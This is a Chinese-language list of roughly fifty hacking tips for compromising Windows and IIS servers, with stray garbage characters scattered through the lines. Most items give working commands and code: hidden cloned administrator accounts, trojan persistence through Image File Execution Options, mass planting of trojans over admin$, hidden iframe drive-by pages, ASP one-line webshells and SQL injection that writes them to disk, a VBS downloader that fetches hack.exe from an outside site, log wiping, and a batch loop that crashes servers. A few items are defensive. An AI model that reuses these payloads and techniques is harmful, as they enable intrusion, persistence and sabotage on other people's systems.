Xp系统修改权限防止病毒或木马等破坏系统,cmd下,4 i$ G9 d/ g( f9 C" ?; H
cacls C:\windows\system32 /G hqw20:R6 r9 Q: f9 o3 Y& e. W
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入9 f, T5 r; _& H- a
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
: r/ Z& E+ A- w* x7 |3 l$ z! m* F' g3 ?- s9 S
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
% A' a3 f5 p8 b3 r
# K; c, A% V' X/ [% S) B3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。4 E( l( J$ b9 a! {" C# [/ ^. Y& |3 t
8 Z2 I# e) n0 r4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
# [& y j9 g8 N$ ~* v4 J/ `5 I+ H
7 k3 b( k) b. w. N! B5、利用INF文件来修改注册表
2 h n# h4 i, H( N' i& s[Version]; I9 v- V; n& P
Signature="$CHICAGO$"
2 |' C0 W) G# O! G8 M[Defaultinstall]
: G* X6 Q6 Z2 D. }addREG=Ating; R5 R: w, z& a
[Ating]
4 o! H) F+ q4 m! yHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
9 O0 n o8 M7 K: A r以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:: y, U$ p2 D. }* \
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径' N8 Q: e! M4 k0 M/ C# b6 M" W4 E% d
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
# M+ f; |& v# C/ k2 {HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU6 e7 I4 g' e+ @! w& v
HKEY_CURRENT_CONFIG 简写为 HKCC) }0 @- ?: I% q& A
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
5 t( p O$ I* v1 Z. L- ?"1"这里代表是写入或删除注册表键值中的具体数据
( O; ^1 _7 Y7 a8 H3 q/ ?7 m
' `* o/ T0 M, x3 C" d6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
' U. B/ x1 T Y多了一步就是在防火墙里添加个端口,然后导出其键值) s- ?4 ^7 _. p6 T" [# ^" y9 U
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
4 W% d2 D1 `8 e3 ?, ]6 K) D. w: m# A* E2 U
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
6 v! U/ l( W0 w" X$ Z; z4 W在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。9 d% b6 V/ N. m( C5 W7 s
1 C8 A* E) H* z# r; Z- A
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。' W8 R- ] X: W, l
1 w/ R5 _2 [. A4 Q
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,0 f' Y k! O! q2 s3 c7 }( G
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。6 o) o+ ]% R1 E) \
% f# u' }( M" x; O" `1 }( G: K1 i
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”) |' _3 O6 n6 C. w' Y" x
( b: [9 i, p4 l* M
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
- |- Q. b6 h- E- Z& }用法:xsniff –pass –hide –log pass.txt$ G* r% t) j, i
$ V' h" m( } c12、google搜索的艺术4 s( b. l/ M4 _1 k& h
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”5 @. b' O8 j! j2 g* n
或“字符串的语法错误”可以找到很多sql注入漏洞。! ^$ O+ ^$ U' c, u
' V9 y l! k- x1 i& t13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。$ Z r U$ R! O' h5 |
0 U, B) z6 L$ r' p) |
14、cmd中输入 nc –vv –l –p 1987, k+ ^" J g2 k8 W- o
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
, P9 ?. n% y" q# }1 z: h/ w. i* Q* w, G8 E+ d {
15、制作T++木马,先写个ating.hta文件,内容为2 ?+ D) r# B1 S# \" B/ m/ T3 ~1 K
<script language="VBScript">
# y0 {7 L: _7 }% I# {+ S5 ?set wshshell=createobject ("wscript.shell" )
: `- r+ H1 }8 E$ P9 }. \+ Q, wa=wshshell.run("你马的名称",1)7 {" l9 k' _& s; G0 n/ z
window.close0 }; l1 Z& R4 s0 C4 q( e
</script>+ Y: J! X: [! f5 y ^
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。: Y# K1 l& G$ N0 q
& ?" y, k" i4 ~0 I2 Z
16、搜索栏里输入
0 m6 V8 r+ K5 w8 m+ f1 e关键字%'and 1=1 and '%'='* u2 Z5 R- J- b5 p) r9 t
关键字%'and 1=2 and '%'='9 x* }/ R1 Z: U, S% M( Y
比较不同处 可以作为注入的特征字符8 Q c+ C2 { Y( o$ L7 i! Q
" ^; f5 d8 m- Y# U5 b
17、挂马代码<html>
! o. K3 U* @& c- a) G& X<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
6 u! q; Q5 q: v! A6 t</html>! M, Q% e1 X$ _$ C) w* p; L* r k
% [5 x% R/ h6 S18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
) g- T3 F) Z( s5 Onet localgroup administrators还是可以看出Guest是管理员来。
! A4 m$ R. v- j8 G
% l; g) m; z/ }" ~0 J- J: v19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
( _( q& G# q& ^9 Q1 k4 l& |用法: 安装: instsrv.exe 服务名称 路径 ]2 v* L5 x! c4 Z* Z# ^! |
卸载: instsrv.exe 服务名称 REMOVE
* S; [& G: \6 ]/ J u* a7 R; A6 O! Y; ?. K
3 r, @' l3 e( C21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
" Z0 i) Q4 s% n+ r不能注入时要第一时间想到%5c暴库。( Y8 K- \) B; [$ O& C
6 P: }$ R( V+ G9 M F
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~. Q5 u f/ w& V& M
D4 R& e/ x1 D$ y: ~' x23、缺少xp_cmdshell时) P' Z! g. K# p5 J& M- ]
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll') |! ?- X7 t" L
假如恢复不成功,可以尝试直接加用户(针对开3389的)9 z$ o+ U9 M- c ]. ~9 ] V ^
declare @o int
$ w5 ]$ U' a9 z" ], |exec sp_oacreate 'wscript.shell',@o out- c6 E1 S' B7 u
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
2 K+ g) ^# l8 _ L' \% C; T/ z3 C7 C3 m
24.批量种植木马.bat/ L9 G# r5 P4 ~2 f, m& W: t- J" l. Z7 E
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中0 Q+ Z4 ? U% G. a( X7 z
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
& H2 c0 J6 A1 V B4 d* v! A扫描地址.txt里每个主机名一行 用\\开头
4 u) q9 X7 G5 g; \
+ J+ V, D9 v! f- L25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
5 ?" H1 p; l( K$ c5 G' Q1 b
: F/ Z% T/ T0 N( l6 _3 C4 Y& Q26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
& O. R# y& M/ C5 ]- X将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
0 ~8 S1 i% B2 s/ |8 n: M.cer 等后缀的文件夹下都可以运行任何后缀的asp木马# \& }7 _3 \" J* i1 V9 z
! z' d" f$ p( X27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
% k% b1 s: y+ C# o然后用#clear logg和#clear line vty *删除日志
2 u. T5 [1 g _# Y1 v; p# K7 [- D
, d/ ]) O, L$ c% A8 Q28、电脑坏了省去重新安装系统的方法2 e8 \ E+ L& L7 e: {
纯dos下执行,- e: Z0 ]5 T3 z- m
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config' m; m. t# ?( Y5 J( ?) G) c
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config+ V6 N% ]6 I- R3 e2 ?# s
" `$ A; A) K/ e0 j+ U u29、解决TCP/IP筛选 在注册表里有三处,分别是:, M2 [0 q7 g$ j* W/ s5 l
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
8 d2 c' c: j f jHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
$ H2 M( }/ E# {0 g% b6 Z3 L& X" vHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip7 Y( _9 ]& a" t( q2 O- C' y* D- O y
分别用6 b& a, \" |! @% b1 t& i
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip, E& b) f k" O$ h' i
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
9 ]- N- i4 u+ X: i1 P# E9 Y, Sregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
4 [% k3 S5 N0 D: c$ x. @' L, D命令来导出注册表项" D8 F/ D5 Y8 ]0 K6 q
然后把三个文件里的EnableSecurityFilters"=dword:00000001,) w# h" t' d/ `: l- Y* c5 r6 i
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用' n& X% D7 D$ {; S% s; Z( l" a0 K
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
9 i/ H6 z4 p$ w2 P4 X0 T! @7 r/ o, m1 L& r1 |8 E) v
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U- ?! n+ U \) G+ Y! }; g$ a
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
. t7 n+ R# [* D2 W& s6 X# N9 Y) {: p2 _9 J
31、全手工打造开3389工具
8 S! h$ f& L2 y1 C1 I% y打开记事本,编辑内容如下:% q/ I0 h/ H- ~; D8 z6 m/ }. ^
echo [Components] > c:\sql6 w S% G, {5 L1 O5 t
echo TSEnable = on >> c:\sql
* O, N, t$ z; g' asysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
5 f; a3 ]% z6 A* {6 R编辑好后存为BAT文件,上传至肉鸡,执行
5 D4 ?1 e: J- f
. ^2 q: R7 J$ n& k( N. ^ w; s32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马- V" V2 j- J6 H2 Z2 i
$ b5 K+ ^( r' p- b33、让服务器重启! m8 Z5 X# ^8 ~& P! h7 J' E
写个bat死循环:
- _/ a' B& B7 O@echo off
# e; f$ ]% A: t9 @" r:loop1
2 `6 e9 j* S6 Ocls
. M$ n& }- u6 k* F* g1 Dstart cmd.exe$ U3 u5 J' d; T
goto loop19 y" {* o+ m' @% {/ p/ o+ u
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启+ I% f' J$ g4 A0 k0 R
, m* E# i0 f! C. p# N
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
9 k0 Y2 ~8 _6 u1 O9 L( u@echo off7 K9 ]3 x. X g. _8 v5 n
date /t >c:/3389.txt
: t6 i5 o9 p m7 stime /t >>c:/3389.txt* G1 ^2 t+ e' F# h3 c
attrib +s +h c:/3389.bat% ^3 T0 I. g8 y. n& f) n3 I
attrib +s +h c:/3389.txt
( m8 ?, X K! d6 j2 m% wnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
2 x( S& j5 [' i% X8 Y8 f并保存为3389.bat# q! M! @. b; V- ~8 x& B2 B
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
* x' N+ V5 v$ _) e. P
& v4 f1 Z0 w8 H, n$ O; v35、有时候提不了权限的话,试试这个命令,在命令行里输入:
! W; W* K2 P* K. Q, Sstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
. @7 t# i% S# H! S5 w' N" Z( Q输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
7 E% q4 Z( ~9 r3 I( Y
9 Z% S4 r5 i0 l& H5 K& S36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
& c8 D. ?1 Z3 v. x& b4 Hecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址, }4 k# n5 m, w- f" q
echo 你的FTP账号 >>c:\1.bat //输入账号/ n4 _" o6 L" s. b+ C
echo 你的FTP密码 >>c:\1.bat //输入密码: Y+ f6 a5 I6 |9 ]1 `6 U
echo bin >>c:\1.bat //登入
2 H/ `: u1 ]2 K; T, k( ~' i B3 Oecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
. m! s: k$ p7 P4 B; Z9 N1 xecho bye >>c:\1.bat //退出
/ j, W+ d# B% a8 b V然后执行ftp -s:c:\1.bat即可
/ J8 i- |% R% U0 h+ M& I% s- B5 x+ a9 a, D5 z
37、修改注册表开3389两法( g% S ?7 v Q& h1 z' F) z+ @
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表" R, R4 g2 f4 m; g/ z
echo Windows Registry Editor Version 5.00 >>3389.reg
* S* B! g. e: e& I. M' b; l: Secho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg9 z+ w8 {$ R5 B! }2 u
echo "Enabled"="0" >>3389.reg
6 ~* g! V% j7 M; L# t$ ~0 }echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows8 z5 \5 c5 e' n3 `4 _
NT\CurrentVersion\Winlogon] >>3389.reg
( v E* N& E& p% G& E# Wecho "ShutdownWithoutLogon"="0" >>3389.reg, ^% D, \& ^( T4 X9 [# h: D% k( a4 W
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]* m+ Z2 \7 n& C x7 {6 L
>>3389.reg
- i+ {; j$ D* j2 \echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg5 U$ e$ V; e8 h: y0 J
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]4 b4 {. ?3 \2 C; b! X
>>3389.reg- L) ^" k0 t7 h! q2 ^2 l, b
echo "TSEnabled"=dword:00000001 >>3389.reg/ w8 k% B' |5 Q5 [
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg9 d! v% X- z% i: q2 S0 r
echo "Start"=dword:00000002 >>3389.reg/ p! v7 j/ o4 k& e/ z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]! V( K. ~) t9 J, } k" U7 s
>>3389.reg
v% ^( t5 g. ^/ `3 u; Cecho "Start"=dword:00000002 >>3389.reg* E D1 L; h1 y$ q9 {( Z
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
1 d- o( Z8 P1 l' l* L& q2 [echo "Hotkey"="1" >>3389.reg+ w2 E, f! w; W! h
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' w. j' L) n% o5 X& @
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
0 l" ^' J3 I" s! M/ Gecho "PortNumber"=dword:00000D3D >>3389.reg
) c' X U# q. M& H _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal" Y- i! y' v0 I b$ B$ p
Server\WinStations\RDP-Tcp] >>3389.reg
" _" B/ Y- O4 j6 g! {echo "PortNumber"=dword:00000D3D >>3389.reg& l4 r9 K- g% X0 B4 s
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
+ F0 I0 E' V4 A5 F8 K7 F/ A8 j(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)! p- j, T, U# ^9 b5 T6 ?# J
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
0 S2 o' b4 e& V$ K8 ?(2)winxp和win2003终端开启
0 `7 s/ I5 F0 i$ s用以下ECHO代码写一个REG文件:
5 Y$ f! {. E/ P: n! J: techo Windows Registry Editor Version 5.00>>3389.reg
. y, ^7 s* \2 D& T( v) _echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
8 Q* b' W# W% ~0 x1 |# A* sServer]>>3389.reg
' W f/ c1 {8 j; r9 t; qecho "fDenyTSConnections"=dword:00000000>>3389.reg
/ c' F x" f4 Cecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; w) }4 \5 d* e" w3 ~8 h. oServer\Wds\rdpwd\Tds\tcp]>>3389.reg; L( B; h% [. D- K" m1 a x
echo "PortNumber"=dword:00000d3d>>3389.reg- W1 K5 s. h' e* z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: K/ a* f1 F6 `Server\WinStations\RDP-Tcp]>>3389.reg
$ o7 \- u, Q+ ]4 k5 c% n0 Recho "PortNumber"=dword:00000d3d>>3389.reg
, g3 K- \+ @8 L然后regedit /s 3389.reg del 3389.reg
K& D" |% b1 {$ y/ [% QXP下不论开终端还是改终端端口都不需重启
4 ]' g2 N9 [6 l) o* E: @7 s
+ q; l% Z. u% m# D1 O. u38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃5 e! `5 p: Z2 ]6 @ w
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'# a4 V* r/ f$ ]
2 Q& y* F: N& Q39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!: Q, L$ s! o( K
(1)数据库文件名应复杂并要有特殊字符
- j/ R. Q" `7 W1 w% E(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
* w* ?) X$ Z' w+ Y% Q将conn.asp文档中的
; t+ ]& E0 A2 `2 rDBPath = Server.MapPath("数据库.mdb")- v5 l- W! j5 ^0 N o
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath: P9 ^* N* _3 W
% R! c' X. f5 g3 I/ S
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置4 h: C$ f9 H- e* p. r0 a
(3)不放在WEB目录里
; R e' x c4 F- q/ b% |/ b" I# T; X$ q0 a4 C) t+ \
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
+ H0 |7 [. c7 [& h可以写两个bat文件9 U3 X0 K) Y: q% d
@echo off
4 C8 k2 s: s8 F, o2 X& W% J@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe" d$ j# d6 W$ ~* d! [3 D
@del c:\winnt\system32\query.exe
( ?0 X% K z* v2 G: r! [. K+ i@del %SYSTEMROOT%\system32\dllcache\query.exe
& V- f6 u U5 a8 D6 x% d* T5 X@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
8 X' G [9 a6 d$ u' L
4 i- p& E- \, m@echo off
5 o i- A; S( H. r7 w; C@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
; E7 O. x$ b7 n- i@del c:\winnt\system32\tsadmin.exe) H' _+ h7 o+ c: i+ y% O
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
* S M, |' G# O! M9 \# q/ F: @+ `* d, r# v
41、映射对方盘符9 l3 b5 R- @4 ^
telnet到他的机器上,' R- }5 Y# b E
net share 查看有没有默认共享 如果没有,那么就接着运行7 L, W5 a5 u6 }' r' S3 `
net share c$=c:
% D. e9 A) Q# U* W: U& o* fnet share现在有c$) Q _ _& ~% V5 t( M
在自己的机器上运行% }* F* i: N1 \% T$ g4 K' m, y& N; T
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
4 P: ~: |' e& B* ?
% `9 }8 T5 U7 @4 g- P8 P# k& e42、一些很有用的老知识
" m$ Y# r0 v% c, A% U' S2 o0 Q/ D3 ztype c:\boot.ini ( 查看系统版本 )$ K' P; F8 _; g o) f2 f
net start (查看已经启动的服务)
, [' b( W8 `) y& Kquery user ( 查看当前终端连接 )1 r$ L" r/ f$ R
net user ( 查看当前用户 )) |5 \( n5 s3 d; E
net user 用户 密码/add ( 建立账号 )) ~* _: S5 M) p/ }2 o( E
net localgroup administrators 用户 /add (提升某用户为管理员), k" y4 m5 A( K( @9 @: L
ipconfig -all ( 查看IP什么的 )- C" t/ h1 [% v, c$ f& f
netstat -an ( 查看当前网络状态 )& @- z0 X8 n* c D% f3 f4 |
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)' w6 a" Q% n! j9 G
克隆时Administrator对应1F4& E/ ^, ?) j' U+ H: _
guest对应1F5
5 Q8 ]- R! {, t4 T- v- y' Ytsinternetuser对应3E83 G9 e! X/ q1 j9 B
" F" s3 z8 d1 j% Z43、如果对方没开3389,但是装了Remote Administrator Service) `+ `: b' S8 W6 L5 [8 k
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接 Z$ d( F- o2 q: e
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
/ ^, ^2 B' [7 U5 x' ~先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"' {' e& ^ a2 k& ?# y' J
7 T" ~+ f# I5 H6 _& `3 l44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
4 P& a0 ]- R6 {1 O# v本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
. [7 ~' A) `8 }% u
( ?+ V0 G. F6 T( y1 J# Q45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)5 l# a" L4 L3 |0 o6 D3 [6 Y
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open1 ^5 o2 O6 D& B
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
6 J/ B+ e9 Z Z; v, k8 MCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =( t, f0 U6 N' A. Q6 h
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
# P2 u' b/ R& `* _1 {(这是完整的一句话,其中没有换行符)
9 S! Y9 i$ ^* g然后下载:: H: O0 \+ j$ m% L9 C1 L
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
0 J6 a* F5 b. r# w& C3 s% N
, \( h4 o4 x4 a: A! M( O0 H46、一句话木马成功依赖于两个条件:
( R( U5 g2 J& ^$ i1、服务端没有禁止adodb.Stream或FSO组件
# U1 {0 |0 H4 ?, ]% m2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。 c5 j) n7 {; {/ r6 b
4 Z- X7 a) ?: C" w47、利用DB_OWNER权限进行手工备份一句话木马的代码:! M' x- ^' n& ]5 ]: t
;alter database utsz set RECOVERY FULL--
: a* N' y* ?: u4 ] k;create table cmd (a image)--
+ H& p) Y- V# X: f- z5 i6 {3 Q;backup log utsz to disk = 'D:\cmd' with init--; z' _4 q: s$ W4 c% N
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
" @8 H8 U, f1 J; D;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--" o* ]3 A C$ y6 [
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。2 u C& z/ t" R h6 P+ a3 d9 ^2 }
; q+ J/ C- m6 W. c0 ^, b
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:, s, d; |5 c0 e& u
( W6 G$ G5 d6 x5 k
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options1 w7 N0 p. d9 [& l# p8 p) S3 N
所有会话用 'all'。' `$ G7 W1 s$ t; l4 H% C5 @; `
-s sessionid 列出会话的信息。 m2 x7 J7 E6 {9 W5 T4 A' K
-k sessionid 终止会话。
0 b! ~* e! X7 {% J1 T; \2 K-m sessionid 发送消息到会话。
, I, q @! B/ ]: @; c
y3 L/ \9 j) ^& S( k/ }config 配置 telnet 服务器参数。5 S$ q# v) f& t, t- |* r4 y# p
! j6 W7 b- m/ Y6 x- F9 ucommon_options 为:
) F- b! n3 h w+ B. k" ]-u user 指定要使用其凭据的用户
6 |/ A# A+ z! x2 V+ C9 N$ u: X& [-p password 用户密码& n' _; g) w) z" ?$ i8 N
: O1 h& {8 h3 [. U9 L
config_options 为:
5 l! n0 k( S8 e- d/ u) `$ odom = domain 设定用户的默认域
3 h+ ? [/ C2 L6 b& S5 gctrlakeymap = yes|no 设定 ALT 键的映射
2 j3 F" F+ e3 {timeout = hh:mm:ss 设定空闲会话超时值3 Z3 m: c# {! r8 t! `3 h3 B$ ]- k [/ t
timeoutactive = yes|no 启用空闲会话。
) m, {7 M1 }) bmaxfail = attempts 设定断开前失败的登录企图数。
* V2 O$ a) @# ]maxconn = connections 设定最大连接数。
& [% {0 x7 s- ~port = number 设定 telnet 端口。" B1 g6 R: {2 }' w2 k' V4 l
sec = [+/-]NTLM [+/-]passwd' t% ?4 i" {0 G4 k" D# X
设定身份验证机构
5 c0 n# I& R& w0 W- wfname = file 指定审计文件名。
; y+ H1 _3 t) J; ofsize = size 指定审计文件的最大尺寸(MB)。
, Y3 u5 a2 f2 {1 Smode = console|stream 指定操作模式。, e, T# s" w% l# W S. ^( i
auditlocation = eventlog|file|both Z$ S& y. N& S; F* D; J+ S
指定记录地点; f! x, B5 c* W8 R
audit = [+/-]user [+/-]fail [+/-]admin: ?0 [4 |& C, u! r" [
2 [" } ?2 v7 Z( d# V49、例如:在IE上访问:9 y7 L% `% I. X, [
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/3 n) d: K# E( R
hack.txt里面的代码是:
6 D' _- I& p0 l. x6 u5 N& l<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">$ g, z* S" b/ D4 Q/ G
把这个hack.txt发到你空间就可以了!( J8 n0 x. N1 `" p* D7 z1 L; l9 [
这个可以利用来做网马哦!: k6 Z2 J: W6 o; u$ S- z( g
0 r2 ^+ x7 G( D- w( Q1 X, O& T/ X5 D5 b50、autorun的病毒可以通过手动限制!
! w% u0 H( r) d0 D8 @1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!. r" a. n1 V, b; A$ m* N: K
2,打开盘符用右键打开!切忌双击盘符~, T% z+ {$ R; q
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!7 _# M! C) k1 [) H3 [1 Z+ L) U
& q4 U" _- b+ j; y& O4 Z2 O* y. w51、log备份时的一句话木马:: Q9 \& \0 `6 N6 x7 E1 t
a).<%%25Execute(request("go"))%%25>& ]! {" [6 ]# A
b).<%Execute(request("go"))%>
/ ]! p1 V5 F' ?3 Gc).%><%execute request("go")%><%* Z' G* N5 Y0 l0 e' {/ f
d).<script language=VBScript runat=server>execute request("sb")</Script>! [& P, n9 r9 ^
e).<%25Execute(request("l"))%25>
5 @. M( Q z/ W3 m4 yf).<%if request("cmd")<>"" then execute request("pass")%>' P. B3 l3 @% Y! ?$ j1 w4 }1 R
' z4 p( v( o" v52、at "12:17" /interactive cmd
& N; i) ^# n. [2 h- d1 E8 ?执行后可以用AT命令查看新加的任务
' Q2 H+ o9 F; b7 |用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。: ^# c/ c) j9 G
8 }0 W( a1 m* D* F% i+ I53、隐藏ASP后门的两种方法
6 f, i) y$ ^% {- R9 Y: ]1、建立非标准目录:mkdir images..\
4 d9 c1 Y/ J: C M: ^拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
